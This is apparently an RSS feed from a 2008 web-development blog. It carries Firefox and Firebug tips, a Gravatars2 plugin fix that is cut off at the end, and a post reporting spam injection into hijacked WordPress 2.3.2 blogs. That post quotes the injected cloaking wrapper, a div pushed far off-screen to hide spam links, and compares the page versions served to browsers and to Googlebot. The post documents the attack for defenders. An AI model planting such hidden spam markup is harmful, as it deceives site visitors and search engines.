<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; Avice De&#8217;veréux</title>
	<atom:link href="http://42.kaizeku.com/author/avice/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Start Firefox with multiple homepage</title>
		<link>http://42.kaizeku.com/firefox/start-firefox-with-multiple-homepage/</link>
		<comments>http://42.kaizeku.com/firefox/start-firefox-with-multiple-homepage/#comments</comments>
		<pubDate>Sat, 12 Jul 2008 15:03:26 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/?p=244</guid>
		<description><![CDATA[

Do you like looking at the Google search (default homepage) every time you open your Firefox or do want Firefox to open all your favorites visited website when its start?. 
Learn how to set Firefox to open multiple homepage on start-up with this few simple step.




Open Firefox goto Tools &#187; Options (for *nix try Edit [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src="http://blog.kakkoi.net/wp-content/uploads/2008/07/firefox-tips-and-tricks-pinpreview-by-chaoskaizer.png" alt="firefox tips and tricks" title="firefox-tips-and-tricks-pinup-preview-by-chaoskaizer" width="128" height="128" class="alignleft size-full wp-image-249" />Do you like looking at the Google search (default homepage) every time you open your <a href="http://www.mozilla.com/en-US/firefox/" title="Firefox">Firefox</a> or do want Firefox to open all your favorites visited website when its start?. </p>
<p>Learn how to set Firefox to open multiple homepage on start-up with this few simple step.</p>
<p><span id="more-244"></span><br />
<a href='http://blog.kakkoi.net/firefox/start-firefox-with-multiple-homepage/attachment/firefox-open-multiple-website-on-startup/' rel="attachment wp-att-245"><img src="http://blog.kakkoi.net/wp-content/uploads/2008/07/firefox-open-multiple-website-on-startup.png" alt="firefox" title="firefox-open-multiple-website-on-startup" width="400" height="245" class="aligncenter size-full wp-image-245" /></a></p>
<ol class="xoxo mgb">
<li>
<p>Open Firefox goto <tt>Tools &raquo; Options</tt> (for *nix try Edit &raquo; Preferences )</p>
<p><a href='http://blog.kakkoi.net/firefox/start-firefox-with-multiple-homepage/attachment/firefox-options-main-tab/' rel="attachment wp-att-246"><img src="http://blog.kakkoi.net/wp-content/uploads/2008/07/firefox-options-main-tab.png" alt="Firefox tool options" title="firefox-options-main-tab" width="328" height="327" class="alignnone size-full wp-image-246" /></a></li>
<li>Select the &#8220;<strong>Main</strong>&#8221; tab</li>
<li>
<p> On the <strong>Homepage</strong> option add your favorite <strong>website URL</strong> or <strong>Keywords</strong>. Separate the URLs with the pipe <tt class="hilite-2">|</tt> characters like the below example &darr;</p>
<pre class="smallbox"> http://google.com|digg|delicious</pre>
<p><a href='http://blog.kakkoi.net/firefox/start-firefox-with-multiple-homepage/attachment/firefox-options-main-tab-set-homepage/' rel="attachment wp-att-247"><img src="http://blog.kakkoi.net/wp-content/uploads/2008/07/firefox-options-main-tab-set-homepage.png" alt="firefox homepage options" title="firefox-options-main-tab-set-homepage" width="375" height="374" class="alignnone size-full wp-image-247" /></a>
</li>
<li> Ok you are done the next time Firefox start it will load all the website.</li>
</ol>
<h2>Where do I add the keywords?</h2>
<p>Keywords are special tag for URL shortcut, bookmarks manager (ctrl+b). </p>
<p><a href='http://blog.kakkoi.net/firefox/start-firefox-with-multiple-homepage/attachment/firefox-bookmark-keywords/' rel="attachment wp-att-248"><img src="http://blog.kakkoi.net/wp-content/uploads/2008/07/firefox-bookmark-keywords.png" alt="firefox add bookmar" title="firefox-bookmark-keywords" width="337" height="249" class="alignnone size-full wp-image-248" /></a></p>
<h2>Might be interest</h2>
<ul class="xoxo">
<li><a href="http://support.mozilla.com/en-US/kb/Options+window">Mozilla KB - Options Window</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/firefox/start-firefox-with-multiple-homepage/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Firebug For Firefox 3</title>
		<link>http://42.kaizeku.com/firefox/firebug-for-firefox-3-release-candiate/</link>
		<comments>http://42.kaizeku.com/firefox/firebug-for-firefox-3-release-candiate/#comments</comments>
		<pubDate>Fri, 23 May 2008 04:33:18 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Firefox Add-ons]]></category>

		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[addons]]></category>

		<category><![CDATA[firebug]]></category>

		<category><![CDATA[firefox3]]></category>

		<category><![CDATA[yslow]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/firefox/firebug-for-firefox-3-release-candiate/</guid>
		<description><![CDATA[

After 6 months waiting Firebug 1.2 is out.

 Firebug 1.2x stable release support all major Firefox version (Firefox 2.0.0.14 > Firefox 3 RC but not recommended for Firefox 3.0b5) . Compatible with Latest Firefox 3 RC 1. 
Download Firebug 1.2x

Firebug 1.2x

Whats new in Firebug 1.2x
Latest version is more friendly and all suppose to be disabled [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<blockquote class="fr" style="width:30%" cite="http://blog.kakkoi.net/mozila-firefox/firebug"><p>After 6 months waiting Firebug 1.2 is out.</p>
</blockquote>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/05/firebug-for-firefox-3.png' alt='firebug for firefox 3' width="128" height="128" class="photo thumb- fl"/> <a href="http://en.wikipedia.org/wiki/Firebug_(Firefox_extension)"><strong>Firebug 1.2x</strong></a> stable release support all major Firefox version <small>(Firefox 2.0.0.14 > Firefox 3 RC but not recommended for Firefox 3.0b5)</small> . Compatible with Latest <strong>Firefox 3 RC 1.</strong> </p>
<h2 class="cb mgb- " title="Download Firebug 1.2x">Download Firebug 1.2x</h2>
<ul class="xoxo exturl pdt">
<li><a href="http://getfirebug.com/releases/">Firebug 1.2x</a></li>
</ul>
<h3 class="mgt ">Whats new in Firebug 1.2x</h3>
<p>Latest version is more friendly and all suppose to be disabled behaviour is turn off by default. This new change will make sure that you wont have problem with high Ajax framework website (i.e., Google Gmail, Msn Live).</p>
<ul class="xoxo">
<li>Improve performance - most of the automate HTTP reporting is disabled by default <small>( for all site)</small>.</li>
<li><em>Firebug Script</em> and <em>Net panels</em> disabled by default.</li>
<li>More accurate Net reporting and Faster Javascript Debugging.</li>
</ul>
<p>Check out firebug 1.2 <a href="http://blog.kakkoi.net/firefox/firebug-for-firefox-3-release-candiate#firebug-release-notes" title="firebug release notes">release notes</a>,<a href="http://blog.kakkoi.net/firefox/firebug-for-firefox-3-release-candiate#firebug-screenshot" title="screenshot">screenshot</a>, <a href="http://blog.kakkoi.net/firefox/firebug-for-firefox-3-release-candiate#firebug-fixes" title="bug fixes &amp; improvement">bug fixes &amp; improvement</a>.<br />
<span id="more-235"></span></p>
<hr/>
<h2 class="mgt" id="firebug-screenshot">Firebug Screenshot</h2>
<p>Firebug 1.2 on Firefox 3 RC1.</p>
<h4>Firebug Console</h4>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/05/firebug-console.gif' alt='Firebug Console' /></p>
<h4 class="cb pdt">Firebug Net Panel Disabled by Default</h4>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/05/firebug-net-panel-disabled.gif' alt='Firebug Net Panel Disabled' /></p>
<h4 class="cb pdt">Firebug Net Panel Enabled</h4>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/05/firebug-net-panel-enabled.gif' alt='firebug-net-panel-enabled.gif' /></p>
<h4 class="cb pdt">Firebug JIT Script Debugger </h4>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/05/firebug-debugger-enabled.gif' alt='Firebug Debugger Enabled' /></p>
<h4 class="cb pdt">Firebug CSS Panel </h4>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/05/firebug-css-panel.gif' alt='Firebug CSS Panel' /></p>
<h4 class="cb pdt">Firebug HTML Panel </h4>
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/05/firebug-html-panel.gif' alt='Firebug HTML Panel' class="mgb cf" /></p>
<hr class="cb mgt mgb"/>
<h3 class="title- mgt mgb- cb" id="firebug-fixes">Firebug 1.2x Bug Fixes &amp; Improvements</h3>
<ol class="dn">
<li>Issue 1: Reload external Firebug window while its tab is hidden closes the window</li>
<li>Issue 2: Can&#8217;t set breakpoints in code called by unload event</li>
<li>Issue 4: Visiting error page causes external Firebug window to close itself</li>
<li>Issue 7 Long URLs in XHR spy rows should be cropped</li>
<li>Issue 14: Programatically disable firebug log from Javascript</li>
<li>Issue 38: console.group should allow optional collapse</li>
<li>Issue 43: Edit CSS behaviour - appending styles to the dom is unexpected. Contribution by tonygentilcore</li>
<li>Issue 65 show HTTP Status code on NET response</li>
<li>Issue 183: Configurable maximum output size</li>
<li>Issue 186 Only one line in net monitor for multiple xhr post requests</li>
<li>Issue 202 Clicking status bar error warning closes firebug</li>
<li>Issue 215 Display total page load time </li>
<li>Issue 216 Improve network monitor to include server-side processing time</li>
<li>Issue 266 PUT &#038; DELETE requests appear as POST requests in firebug</li>
<li> Issue 316 Show HTTP request method and request content in Firebugs &#8220;Net&#8221; tab</li>
<li>Issue 325 PUT operations do not show contained entity in Net tab</li>
<li> Issue 327 &#8220;Net&#8221; tab: lowercase b for bytes (instead of B)</li>
<li>Issue 331 XHR resolves relative URIs to resource:// protocol</li>
<li> Issue 346 Fix Net Panel timings</li>
<li>Issue 349 Local file XHR events not listed in console</li>
<li> Issue 359 No entry in the Net tab for XHR when response content length is 0</li>
<li>Issue 361: Edit button gets stuck when reloading page whilst editing CSS. Contribution by tonygentilcore</li>
<li> Issue 393: Text overlayed on text in script editor window.</li>
<li>Issue 401 Net tab does not consider &#8220;application/javascript&#8221; a JS MIME type</li>
<li> Issue 402 Net tab tries to show previews of non-images with image file extensions</li>
<li> Issue 404 UI change to help users activate expensive debugging features only when they need them.</li>
<li>Issue 405 The Net panel consumes a lot of memory if there is a lot of XHR activity without page reload.</li>
<li>Issue 414 XHR Breaks When Using Firebug 1.1 beta when > 1 HTTP 302 Redirect Is Returned</li>
<li>Issue 421 onLoad of XHRSpyListener does not fire correctly</li>
<li> Issue 430 about:blank pages always show firebug as enabled</li>
<li>Issue 468 [feature request] fast [enable -> inspect element -> disable] ergonomy</li>
<li> Issue 474: base href applied to scripts</li>
<li> Issue 475 Show Return Code (HTTP HEADER-Response)</li>
<li>Issue 503 disable doesn&#8217;t work properly</li>
<li> Issue 567: Slow script warning in debugger.js on some pages</li>
<li> Issue 573: setting css background-color affects layout inspector. Contribution by tonygentilcore</li>
<li>Issue 583 Javascript console cannot work with Firefox 3 beta5</li>
<li> issue 599, Firebug Inspect Outline Does Not Show Up Over Web Page Elements</li>
<li> Issue 601 XHR in console shows stale/cached output</li>
<li> Issue 618: HTML: tab order, fixed by setting order properties on side panels.</li>
<li> Issue 619: Reopening firebug results in grey DOM, Layout or Style Pane, fixed by forceUpdate on syncSidePanel.</li>
<li> Issue 634 XHR request details not showing up</li>
<li> Issue 637 $ FireBug function overwrites existing $ function</li>
<li> Issue 659: firebug.js:1473 - &#8220;this.context.browser is undefined&#8221;</li>
<li> Issue 676 Exception in firebug-cache.js when visiting http://www.takebacktheweb.org/CaE.html</li>
<li> Issue 679 Firebug 1.2.0a27X blocking most AJAX calls</li>
<li> Issue 690 New zh-CN local file for Firebug 1.2</li>
</ol>
<h2 class="mgt pdt mgb-">External Links</h2>
<ul class="xoxo exturl">
<li><a id="firebug-release-notes" href="http://code.google.com/p/fbug/source/browse/branches/firebug1.2/docs/ReleaseNotes_1.2.txt" title="Firebug 1.2x Release Notes">Firebug 1.2x Release Notes</a></li>
<li><a href="http://code.google.com/p/fbug/" title="Firebug at Google Code">Firebug at Google Code</a></li>
<li><a href="http://www.getfirebug.com/">Official Firebug Website</a></li>
<li><a href="http://developer.yahoo.com/yslow/" title="Firebug addon YSlow" class="ext">Yslow</a<cite>YSlow analyzes web pages and tells you why they&#8217;re slow based on the rules for high performance web sites. YSlow is a Firefox add-on integrated with the popular Firebug web development too</cite></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/firefox/firebug-for-firefox-3-release-candiate/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Blackhat SEO Spammer targeting High PR WordPress Blog</title>
		<link>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/</link>
		<comments>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 20:14:48 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[owned]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[css cloacking]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/</guid>
		<description><![CDATA[thinkingphp.org (PR6) &#038; jensfrake.com (PR7) has been hijacked by “Wordpress Blackhat SEO Spammer” for this month. Both sites were running on WordPress 2.3.2.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />I&#8217;ve been monitoring <span class="vcard"><a class="url fn microformat icn-r1" href="http://mattheaton.com" title="bluehost &#038; hostmonster CEO">mattheaton.com</a></span> &#8220;<strong class="fw-">wordpress.net.in goro spam injections</strong>&#8221; for this past few months. Noticeably, the blackhat spamming method is changing dramatically. For those who are still unaware of Wordpress Goro Spam please read my earlier post &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/" title="Matt Heaton BlueHost HostMonster CEO's Official Blog Hacked">Wordpress.net.in Spam injection</a>&#038; <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/" title="Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II">Gaming Bluehost &#038; Hostmonster CEO&#8217;s Blog</a>.</p>
<p><a href="http://thinkingphp.org" class="exturl icn-r1" title="thinkingphp.org">thinkingphp.org </a><small>(PR6)</small> &#038; <a href="http://jensfrake.com" title="jensfrake.com" class="exturl icn-r1">jensfrake.com</a> <small>(PR7)</small> has been hijacked by &#8220;Wordpress Blackhat SEO Spammer&#8221; for this month. Both sites were running on <strong>WordPress 2.3.2</strong>. </p>
<p>By now the <strong class="fw-"><em title="id goro">&lt;div id=&#8221;goro&#8221;&gt;</em></strong> signature has been replaced with &#8220;Inline CSS&#8221; wrapper.</p>
<h3>Cloacking Check on Mattheaton.com</h3>
<dl class="def">
<dt>Normal Browser</dt>
<dd>32,246 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/mattheaton-com-source.txt' title='mattheaton-com-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">mattheaton-com-source.txt</a></dd>
<dt>Google bot</dt>
<dd>34,646 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/mattheaton-com-googlebot-source.txt' title='mattheaton-com-googlebot-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">mattheaton-com-googlebot-source.txt</a></dd>
<dt>Difference</dt>
<dd>2,400 characters</dd>
</dl>
<p><span id="more-209"></span></p>
<h3>Cloacking Check on jensfrake.com &#038; blog.jensfrake.com</h3>
<dl class="def">
<dt>Normal Browser</dt>
<dd>59,580 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/blogjensfrakecomsource.txt' title='blogjensfrakecomsource.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">blogjensfrakecom.txt</a></dd>
<dt>Google bot</dt>
<dd>59,699 characters - <a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/blog-jensfrake-com-googlebot-source.txt' title='blog-jensfrake-com-googlebot-source.txt' class="inturl icn-l1" rel="nofollow noarchive noindex" type="text/plain">blogjensfrakecom-googlebot.txt</a></dd>
<dt>Difference</dt>
<dd>119 characters</dd>
</dl>
<p class="notice">While scanning jensfrake.com their server return 400-500 error, so we had to scan his (clone) subdomain blog.jensfrake.com instead of the main site</p>
<p>This time around, you wont see the spam on both of this website, all the spam links is position out of the client view-port (top -3337px, left -2227px). </p>
<p><small>another mathematical jokes, l33t.</small></p>
<pre>
&lt;div style=&quot;left: -2227px; position: absolute; top: -3337px&quot;&gt;
</pre>
<h5 class="mgb-">What&#8217;s new with Goro spam 2008</h5>
<ul class="xoxo exturl">
<li>WordPress <= 2.3.2 is vulnerable to this attack. </li>
<li>Inject Spamlinks wrap with extra Inline CSS for cloacking</li>
<li>Target High PR Sites &rarr; PR5 and above</li>
</ul>
<h5 class="mgt mgb-">Related Post</h5>
<ul class="xoxo exturl">
<li><a class="inturl" href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/" title="Matt Heaton BlueHost HostMonster CEO Official Blog Hacked">Matt Heaton BlueHost HostMonster CEO&#8217;s Official Blog Hacked</a></li>
<li><a class="inturl" href="/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" title="How to Removed Wordpress.net.in Spam Injection">How to Removed Wordpress.net.in Spam Injection</a></li>
<li><a class="inturl" href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/" title="Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II">Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</a></li>
</ul>
<h3 class="mgt">External Links</h3>
<ul class="xoxo exturl">
<li><a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNi00NzQz.curie,80,302" title="National Vulnerabilities Database (NVD) on Wordpress 2.0 &gt; 2.0.5 vulnerabilities">National Vulnerabilities Database (NVD) on Wordpress 2.0 &gt; 2.0.5 vulnerabilities</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/blackhat-seo-spammer-target-high-pr-wordpress-blog/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to Setup Firefox 3 (beta) AutoComplete</title>
		<link>http://42.kaizeku.com/firefox/how-to-setup-firefox-3-beta-autocomplete/</link>
		<comments>http://42.kaizeku.com/firefox/how-to-setup-firefox-3-beta-autocomplete/#comments</comments>
		<pubDate>Sun, 06 Jan 2008 05:34:04 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[about:config hack]]></category>

		<category><![CDATA[aboutconfig]]></category>

		<category><![CDATA[ajax]]></category>

		<category><![CDATA[autocomplete]]></category>

		<category><![CDATA[firefox+hack]]></category>

		<category><![CDATA[firefox3]]></category>

		<category><![CDATA[json]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[Tutorials]]></category>

		<category><![CDATA[web+browser]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/firefox/how-to-setup-firefox-3-beta-autocomplete/</guid>
		<description><![CDATA[


Firefox 3 (beta) is amazing and much-much better than its earlier versions. But there is some minor caveat that I think is a bit annoying (In my opinion) the Autocompletion. The autocomplete max results is set to 25 by default, if there is similar results when you type in any URL in the address bar, [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="note mgb rr"><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/firefox-wordmark.png' alt='firefox3 logo wordmark' class="fl" width='79' height='100' /><br />
<a href="http://www.mozilla.com/en-US/firefox/all-beta.html" title="firefox 3 beta at mozilla.org">Firefox 3 (beta)</a> is amazing and much-much better than its earlier versions. But there is some minor caveat that I think is a bit annoying (In my opinion) the <a href="http://en.wikipedia.org/wiki/Autocompletion" title="wikipidea articles on autocomplete" class="exturl icn-r">Autocompletion</a>. The <strong class="fw-">autocomplete</strong> max results is set to 25 by default, if there is similar results when you type in any <abbr title="Uniform Resources Locator">URL</abbr> in the address bar, it will stretch down quite far (and disappeared within few seconds). </p>
<p>This is not something that I can&#8217;t live with, but it&#8217;s really straining my eyes every now and then. So here&#8217;s a quick guide on how you can manage the auto-complete results with your own preferences, complete with visual guide. </p>
<p><span id="more-137"></span></p>
<dl id="firefox-3b-autocomplete" class="profile mgt cb cf">
<dd>
<h2>Firefox About Config</h2>
<p><span class="fw">1.</span> First, open Firefox Browser type <em>about:config</em> in address bar. (optionally you may uncheck the &#8220;show this warning next time&#8221; and proceed with clicking &#8220;I&#8217;ll be careful, I promise!&#8221;. :)</dd>
<dd id="about-config">
<img width='572' height='396' src='http://blog.kakkoi.net/wp-content/uploads/2008/01/about-config.png' alt='firefox aboutconfig' />
</dd>
<dd id="firefox-advanced-preferences">
<h2>Setup Firefox Advanced Preferences</h2>
<p><span class="fw">2.</span>on <cite>about:config</cite> &#8216;filter&#8217; input bar, type in <strong>browser.urlbar.maxRichResults</strong>.
</dd>
<dd>
<img class="mgt mgb" width='451' height='189' src='http://blog.kakkoi.net/wp-content/uploads/2008/01/autocomplete-settings.png' alt='firefox autocomplete settings browser.urlbar.maxRichResults' />
</dd>
<dd>
<span class="fw">3.</span> Click on <em>browser.urlbar.maxRichResults</em>. On the <cite>Input Prompt Window</cite> type in your prefer value. For this guide I set it to 5 (recommended settings is around 5 - 10 ).
</dd>
<dd>
<img class="mgt mgb" src='http://blog.kakkoi.net/wp-content/uploads/2008/01/autocomplete-set.png' alt='set firefox autocomplete' width='476' height='298' />
</dd>
<dd class="mgt">
<span class="fw">4.</span> Result should be similar like the below example.</p>
<dd>
<img class="mgt mgb" width='460' height='210' src='http://blog.kakkoi.net/wp-content/uploads/2008/01/autocomplete-fin.png' alt='firefox Advanced Preferences browser.urlbar.maxRichResults set to 5' />
</dd>
<dd>
<span class="fw">5.</span> Finished, restart your Firefox browser and test the auto-complete.
</dd>
<dd>
<img class="mgt mgb" width='491' height='229' src='http://blog.kakkoi.net/wp-content/uploads/2008/01/autocomplete-preview.png' alt='autocomplete-preview.png' />
</dd>
</dl>
<p>Thanks for reading, merci</p>
<h2 class="cb">Related Posts</h2>
<ul class="xoxo">
<li><a class="inurl icn-r1" href="/firefox/firefox-20012-security-release/">Firefox 2.0.0.12 Urgent Security Release</a></li>
</ul>
<h2 class="cb mgb-">External Links</h2>
<ul class="xoxo exturl pdt">
<li><a rel="nofollow external" href="http://www.mozilla.org/support/firefox/tips">Mozilla Firefox Help: Tips &amp; Trick</a></li>
<li><a href="http://www.google.com/search?q=firefox3+autocomplete">Google Firefox3 Autocomplete</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/firefox/how-to-setup-firefox-3-beta-autocomplete/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Firebug for Firefox 3.0b+</title>
		<link>http://42.kaizeku.com/firefox/firebug-for-firefox-30b/</link>
		<comments>http://42.kaizeku.com/firefox/firebug-for-firefox-30b/#comments</comments>
		<pubDate>Sat, 05 Jan 2008 06:54:31 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Firefox Add-ons]]></category>

		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[addons]]></category>

		<category><![CDATA[firebug]]></category>

		<category><![CDATA[fireclipse]]></category>

		<category><![CDATA[firefox3]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/firefox/firebug-for-firefox-30b/</guid>
		<description><![CDATA[

I really lost without Firebug. Googling around I found this Firebug 1.1.0b10. Its compatible with Firefox 3.0b1, 3.0b2, 3.0b3, 3.0b4 &#038; Latest 3.0b5 (beta 5)  . Until Joe Hewitt release Firebug 1.1 (probably for firefox 3 release) You can try this Firebug 1.1 beta, download it at fireclipse. It working hu ho.
Excerpt from fireclipse
Firebug [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/firebug-firefox-3.png' alt='firebug-firefox-3.png' width="128" height="128" class="photo thumb- fl" />I really lost without <a href="http://en.wikipedia.org/wiki/Firebug_(Firefox_extension)"><abbr title="FirefoxAddons">Firebug</abbr></a>. Googling around I found this <strong>Firebug 1.1.0b10</strong>. Its <cite>compatible</cite> with <strong class="fw-">Firefox 3.0b1, 3.0b2, 3.0b3, 3.0b4 &#038; Latest 3.0b5 (beta 5) </strong> . Until <span class="vcard"><a href="http://www.joehewitt.com/" class="url fn microformat icn-r1">Joe Hewitt</a></span> release Firebug 1.1 <cite>(probably for firefox 3 release)</cite> You can try this <strong class="fw- hilite-4">Firebug 1.1 beta</strong>, download it at <a href="http://fireclipse.xucia.com" rel="external nofollow" class="exturl icn-r1">fireclipse</a>. It working hu ho.</p>
<p class="mgb-"><small>Excerpt from fireclipse</small></p>
<blockquote class="mgt-"><p class="quote"><strong>Firebug 1.1</strong> is Firebug 1.05 by Joe Hewitt with enhancements and bug fixes by John J. Barton (IBM Almaden) and Max Stepanov (aptana)<br/><br/>The file is an XPI file that will add-on to Firefox as Firebug v1.1. Firefox&#8217;s updater will allow you to get new experimental versions until Firebug 1.1 is official. </p>
</blockquote>
<p><span id="more-130"></span></p>
<h3 class="cb mgt mgb-">Download</h3>
<ul class="xoxo exturl pdt">
<li><a href="http://getfirebug.com/releases/">Firebug Release Archive</a></li>
</ul>
<h5 class="cb mgt mgb-">Related Posts</h5>
<ul class="xoxo exturl">
<li><a class="inturl" title="Firefox 2.0.0.12 Urgent Security Release" href="/firefox/firefox-20012-security-release/">Firefox 2.0.0.12 Urgent Security Release</a></li>
</ul>
<h3 class="cb mgt mgb-">External Links</h3>
<ul class="xoxo exturl">
<li><a title="Firebug 1.10b Overview" href="http://fireclipse.xucia.com/page/Fireclipse_Overview">Firebug 1.10b Overview</a></li>
<li><a href="http://www.getfirebug.com/">Official Firebug</a></li>
<li><a href="http://groups.google.com/group/firebug">Firebug Google Group</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/firefox/firebug-for-firefox-30b/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to Fix Gravatars2 PHP5 HTTPRequest Fatal Error</title>
		<link>http://42.kaizeku.com/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/</link>
		<comments>http://42.kaizeku.com/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/#comments</comments>
		<pubDate>Wed, 26 Dec 2007 19:41:00 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Plugins]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[gravatars]]></category>

		<category><![CDATA[gravatars2]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[plugins]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/tips/how-to-fixes-gravatars2-httprequest-fatal-error-php5-classname-conflicts/</guid>
		<description><![CDATA[I used <a href="http://zenpax.com/gravatars2/" rel="nofollow">gravatars2</a> plugins to support my <a href="http://theme.istalker.net">new sexy theme</a>. There is some minor issue (throw fatal Error in PHP5.1) with this WordPress plugin. I <a href="http://zenpax.com/gravatars2/discussion/#comment-2951" rel="nofollow">did asked</a> them to updated it but till today's this bug still exists with Gravatars2 plugins.

<pre class="prebox" style="height:50px;width:90%">
Plugin could not be activated because it triggered a <strong>fatal error</strong>.
Fatal error: Cannot redeclare class httprequest in /../wp-content/plugins/gravatars2.php on line 284
</pre>

This "fatal error" or conflict happen if you had PHP 5 ( 5.0 > 5.1 above) with  <a href="http://usphp.com/manual/en/function.httprequest-send.php">HTTPRequest</a> Modules Installed. ]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I used <a href="http://zenpax.com/gravatars2/">gravatars2</a> plugins to support my <a href="http://theme.istalker.net">new sexy theme</a>. There is some minor issue (throw fatal Error in PHP5.1) with this WordPress plugin. I <a rel="nofollow" href="http://zenpax.com/gravatars2/discussion/#comment-2951">did asked</a> them to updated it but till today&#8217;s this bug still exists with Gravatars2 plugins.</p>
<p>This <em>&#8220;fatal error&#8221;</em> or conflict happen if you had PHP 5 ( 5.0 &gt; 5.1 above) with <a href="http://usphp.com/manual/en/ref.http.php">HTTPRequest</a> Modules Installed.<br />
<span id="more-111"></span></p>
<pre class="prebox" style="height:50px;width:550px;overflow:auto">
Plugin could not be activated because it triggered a <strong>fatal error</strong>.
